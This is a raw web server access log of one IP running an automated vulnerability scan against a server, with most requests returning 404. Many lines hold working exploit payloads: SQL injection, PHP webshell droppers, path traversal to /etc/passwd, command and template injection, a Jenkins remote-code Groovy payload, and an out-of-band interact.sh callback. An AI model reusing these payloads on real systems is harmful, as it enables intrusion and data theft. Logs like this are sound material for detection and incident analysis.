205.185.122.202 - - [19/Oct/2025:20:53:28 +0530] "GET /ftp.tar.gz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:28 +0530] "GET /module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(1224)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:20:53:28 +0530] "GET /CONTRIBUTING HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:53:28 +0530] "GET /install.sh HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:28 +0530] "GET /ftp.rar HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:29 +0530] "GET /install.md HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:29 +0530] "GET /deploy.sh HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:29 +0530] "GET /ftp.7z HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:29 +0530] "GET /install.txt HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:29 +0530] "GET /upload.sh HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:29 +0530] "GET /ftp.gz HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:29 +0530] "GET /install HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:29 +0530] "GET /setup.sh HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:29 +0530] "GET /ftp.tgz HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:29 +0530] "GET /install.php.md HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:53:29 +0530] "GET /backup.sh HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:30 +0530] "GET /ftp.tar.bz2 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:30 +0530] "GET /install.php.txt HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:53:30 +0530] "GET /rsync.sh HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:30 +0530] "GET /database.zip HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:53:30 +0530] "POST /tools/manage/upload.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:20:53:30 +0530] "GET /install.php HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:30 +0530] "GET /sync.sh HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:30 +0530] "GET /database.tar.gz HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:53:30 +0530] "GET /INSTALL.md HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:30 +0530] "GET /test.sh HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:30 +0530] "GET /database.rar HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:53:31 +0530] "GET /INSTALL.txt HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:31 +0530] "GET /run.sh HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:31 +0530] "GET /database.7z HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:31 +0530] "GET /slyhudnnxt HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:31 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:20:53:31 +0530] "GET /INSTALL HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:31 +0530] "GET /database.gz HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:31 +0530] "GET /data.sql HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:31 +0530] "GET /MAINTAINERS.md HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:53:31 +0530] "GET /database.sql HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:53:31 +0530] "GET /database.tgz HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:53:32 +0530] "GET /MAINTAINERS.txt HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:53:32 +0530] "GET /db.sql HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:32 +0530] "GET /database.tar.bz2 HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:53:32 +0530] "GET /MAINTAINERS HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:32 +0530] "GET /test.sql HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:32 +0530] "GET /data.zip HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:32 +0530] "GET /UPGRADE.md HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:32 +0530] "GET /admin.sql HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:32 +0530] "GET /data.tar.gz HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:32 +0530] "GET /UPGRADE.txt HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:32 +0530] "GET /report.m?a=rpc-timed HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:33 +0530] "GET /backup.sql HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:33 +0530] "GET /data.rar HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:33 +0530] "GET /UPGRADE HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:33 +0530] "GET /dump.sql HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:33 +0530] "GET /data.7z HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:33 +0530] "GET /create.sql HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:33 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:20:53:33 +0530] "GET /ndnrosztiv HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:33 +0530] "GET /data.gz HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:33 +0530] "GET /readme.html HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:34 +0530] "GET /data.tgz HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:34 +0530] "GET /data.tar.bz2 HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:53:34 +0530] "GET /db.zip HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:34 +0530] "GET /kzhdrwbmpt HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:35 +0530] "GET /db.tar.gz HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:35 +0530] "GET /.ssh/id_rsa.pub HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:53:35 +0530] "GET /ihuwffimfh HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:35 +0530] "GET /.ssh/id_dsa.pub HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:53:35 +0530] "GET /db.rar HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:35 +0530] "GET /index.php/example.com HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:20:53:35 +0530] "GET /103.10.134.234.sql HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:53:35 +0530] "GET /id_rsa.pub HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:35 +0530] "GET /db.7z HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:53:35 +0530] "GET /.ssh/authorized_keys HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:20:53:35 +0530] "GET /db.gz HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:53:36 +0530] "GET /secure/ManageFilters.jspa?filter=popular&filterView=popular HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:20:53:36 +0530] "GET /db.tgz HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:36 +0530] "GET /db.tar.bz2 HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:36 +0530] "GET /backup.zip HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:37 +0530] "GET /backup.tar.gz HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:53:37 +0530] "GET /backup.rar HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:37 +0530] "GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=19405jpaek&adminpassword=18253yscky&adminemail=14851tklej@test.com&adminname=test HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:20:53:37 +0530] "GET /backup.7z HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:38 +0530] "GET /backup.gz HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:38 +0530] "POST /server/index.php?s=/api/user/login HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:53:38 +0530] "GET /backup.tgz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:38 +0530] "GET /backup.tar.bz2 HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:53:39 +0530] "GET /test.zip HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:39 +0530] "GET /test.tar.gz HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:39 +0530] "GET /test.rar HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:39 +0530] "GET /test.7z HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:40 +0530] "GET /index.php?a=fetch&content=%3C?php+file_put_contents(%2210776.php%22,%22%3C?php+echo+1528230315;unlink(__FILE__);%3B%22)%3B HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:40 +0530] "GET /test.gz HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:40 +0530] "GET /10776.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:40 +0530] "GET /test.tgz HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:40 +0530] "GET /test.tar.bz2 HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:53:41 +0530] "GET /tmp.zip HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:41 +0530] "GET /changePassword?username=xkptep HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:53:41 +0530] "GET /tmp.tar.gz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:53:41 +0530] "GET /tmp.rar HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:41 +0530] "GET /tmp.7z HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:42 +0530] "GET /tmp.gz HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:42 +0530] "GET /tmp.tgz HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:42 +0530] "GET /tmp.tar.bz2 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:43 +0530] "GET /temp.zip HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:43 +0530] "GET /temp.tar.gz HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:43 +0530] "GET /temp.rar HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:43 +0530] "POST /index.php?s=captcha HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:53:43 +0530] "GET /temp.7z HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:44 +0530] "GET /temp.gz HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:53:44 +0530] "GET /temp.tgz HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:53:44 +0530] "GET /webadmin/tools/unixlogin.php?login=admin&password=g'%2C'')%3Bimport%20os%3Bos.system('echo%20duupmhjo%20%3E%20log15772.txt')%23&timeout=5 HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:20:53:44 +0530] "GET /temp.tar.bz2 HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:53:45 +0530] "GET /103.10.134.234.zip HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:53:45 +0530] "GET /103.10.134.234.tar.gz HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:20:53:45 +0530] "GET /103.10.134.234.rar HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:53:46 +0530] "GET /103.10.134.234.7z HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:53:46 +0530] "GET /103.10.134.234.gz HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:53:46 +0530] "GET /103.10.134.234.tgz HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:53:46 +0530] "GET /103.10.134.234.tar.bz2 HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:20:53:47 +0530] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27apap%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1" 404 1220
205.185.122.202 - - [19/Oct/2025:20:53:49 +0530] "GET /admin/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:53:52 +0530] "POST /jquery-picture-cut/src/php/upload.php HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:20:53:52 +0530] "POST /src/php/upload.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:53:53 +0530] "POST /php/ping.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:53:56 +0530] "GET /getCorsFile?urlPath=http://interact.sh HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:53:57 +0530] "PUT /vdatns.jsp/ HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:20:54:00 +0530] "GET /plus/download.php?open=1&link=aHR0cHM6Ly93d3cuZHUxeDNyMTIuY29t HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:54:00 +0530] "POST /defaultroot/upload/fileUpload.controller HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:20:54:02 +0530] "GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:20:54:03 +0530] "GET /html/log HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:54:03 +0530] "GET /services/system/info.html HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:20:54:05 +0530] "POST /x/..//RestAPI/LicenseMgr HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:20:54:06 +0530] "GET /download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:54:06 +0530] "GET /laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:20:54:08 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:20:54:09 +0530] "POST /source/pack/upload/index-uplog.php HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:20:54:11 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:20:54:12 +0530] "GET /wp-json/wp/v2/users/ HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:20:54:14 +0530] "GET /libraries/ HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:54:15 +0530] "GET /layouts/ HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:54:16 +0530] "GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331 HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:54:16 +0530] "GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(5)+or+' HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:54:18 +0530] "GET /viewthread.php?tid=10 HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:54:19 +0530] "GET /artifactory/api/access/api/v1/users HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:20:54:20 +0530] "POST /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:54:21 +0530] "POST /opensis/index.php HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:54:21 +0530] "POST /tools/manage/upload.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:20:54:23 +0530] "POST /autodiscover/autodiscover.json HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:20:54:24 +0530] "GET /report.m?a=rpc-timed HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:54:26 +0530] "GET /ui_base/js/..%2f..%2f..%2f..%2fsettings.js HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:54:27 +0530] "GET /index.php/example.com HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:20:54:29 +0530] "GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:54:30 +0530] "GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=16714bsucz&adminpassword=10257txmsr&adminemail=17631nypdh@test.com&adminname=test HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:20:54:32 +0530] "GET /tool/log/c.php?strip_slashes=md5&host=aaxercrs HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:54:32 +0530] "GET /index.php?a=fetch&content=%3C?php+file_put_contents(%2213106.php%22,%22%3C?php+echo+1062855433;unlink(__FILE__);%3B%22)%3B HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:54:33 +0530] "GET /13106.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:54:34 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:54:35 +0530] "POST /index.php?s=captcha HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:54:37 +0530] "POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:20:54:38 +0530] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27ryiv%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1" 404 1220
205.185.122.202 - - [19/Oct/2025:20:54:41 +0530] "GET /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:20:54:42 +0530] "POST /jquery-picture-cut/src/php/upload.php HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:20:54:42 +0530] "POST /src/php/upload.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:54:44 +0530] "POST /form/DataApp HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:54:45 +0530] "GET /getCorsFile?urlPath=http://interact.sh HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:54:47 +0530] "GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= HTTP/1.1" 404 1090
205.185.122.202 - - [19/Oct/2025:20:54:48 +0530] "GET /plus/download.php?open=1&link=aHR0cHM6Ly93d3cuZHUxeDNyMTIuY29t HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:54:50 +0530] "POST /RestAPI/getAPIKey HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:54:51 +0530] "GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:20:54:53 +0530] "POST /api/tokens HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:54:54 +0530] "POST /x/..//RestAPI/LicenseMgr HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:20:54:57 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:54:58 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:20:55:00 +0530] "POST /sysShell HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:55:01 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:20:55:03 +0530] "GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/../version.txt HTTP/1.1" 404 1096
205.185.122.202 - - [19/Oct/2025:20:55:05 +0530] "GET /libraries/ HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:55:07 +0530] "GET /layouts/ HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:55:08 +0530] "PUT /v2/keys/vtkiqanudewgrhiaamxypjmgvpkagovf?dir=true HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:20:55:09 +0530] "GET /viewthread.php?tid=10 HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:55:11 +0530] "GET /jars HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:20:55:12 +0530] "POST /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:55:12 +0530] "POST /opensis/index.php HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:55:13 +0530] "GET /.%00/WEB-INF/web.xml HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:55:14 +0530] "GET /a/b/..%00/WEB-INF/web.xml HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:55:14 +0530] "POST /autodiscover/autodiscover.json HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:20:55:17 +0530] "GET /include/downmix.inc.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:20:55:18 +0530] "GET /ui_base/js/..%2f..%2f..%2f..%2fsettings.js HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:55:20 +0530] "POST /login_check.php HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:55:21 +0530] "GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:55:24 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:20:55:25 +0530] "GET /tool/log/c.php?strip_slashes=md5&host=pwadcncm HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:55:29 +0530] "GET /source/pack/127.0.0.1/download.php?site=1%3Becho+%27%3C%3Fphp+echo+md5%2840320%29%3Bunlink%28__FILE__%29%3B%3F%3E%27+%3E+trljgi.php%3B HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:20:55:30 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:55:33 +0530] "GET /wp-admin/admin-ajax.php?action=formcraft3_get&URL=http://127.0.0.1:0 HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:20:55:34 +0530] "POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:20:55:37 +0530] "GET /portal/SptmForPortalThumbnail.jsp?preview=portal/SptmForPortalThumbnail.jsp HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:20:55:37 +0530] "GET /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:20:55:39 +0530] "GET /data/pbootcms.db HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:55:39 +0530] "POST /form/DataApp HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:55:41 +0530] "POST /swarm.cgi HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:55:42 +0530] "GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= HTTP/1.1" 404 1090
205.185.122.202 - - [19/Oct/2025:20:55:45 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:55:46 +0530] "POST /RestAPI/getAPIKey HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:55:48 +0530] "GET /ping HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:20:55:49 +0530] "POST /api/tokens HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:55:51 +0530] "GET /logfile?d=crossdomain.xml HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:55:53 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:55:55 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:20:55:56 +0530] "POST /sysShell HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:56:00 +0530] "GET /ui/h5-vsan/rest/proxy/service/a/b HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:20:56:01 +0530] "GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/../version.txt HTTP/1.1" 404 1096
205.185.122.202 - - [19/Oct/2025:20:56:04 +0530] "GET /web/php/sendLogToSupport.php?cmd=send_log&dev=a HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:20:56:05 +0530] "PUT /v2/keys/mfqcifrhxcqenetyzrcwflxetxxxhwwu?dir=true HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:20:56:06 +0530] "POST /user/zs.php?do=save HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:56:07 +0530] "GET /jars HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:20:56:09 +0530] "POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/gjgkoisjea.jsp HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:20:56:10 +0530] "GET /.%00/WEB-INF/web.xml HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:56:10 +0530] "GET /a/b/..%00/WEB-INF/web.xml HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:56:11 +0530] "GET /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(md5(14046))--%20&only_tasks=1 HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:20:56:11 +0530] "GET /scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(md5(14046))--%20&only_tasks=1 HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:20:56:12 +0530] "GET /include/downmix.inc.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:20:56:14 +0530] "PUT /202682690.txt HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:20:56:14 +0530] "POST /login_check.php HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:56:16 +0530] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:20:56:17 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:20:56:19 +0530] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:56:20 +0530] "POST /?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]=upjn%25%25gnvi HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:56:20 +0530] "POST /?q=file%2Fajax%2Fname%2F%23value%2F HTTP/1.1" 200 11250
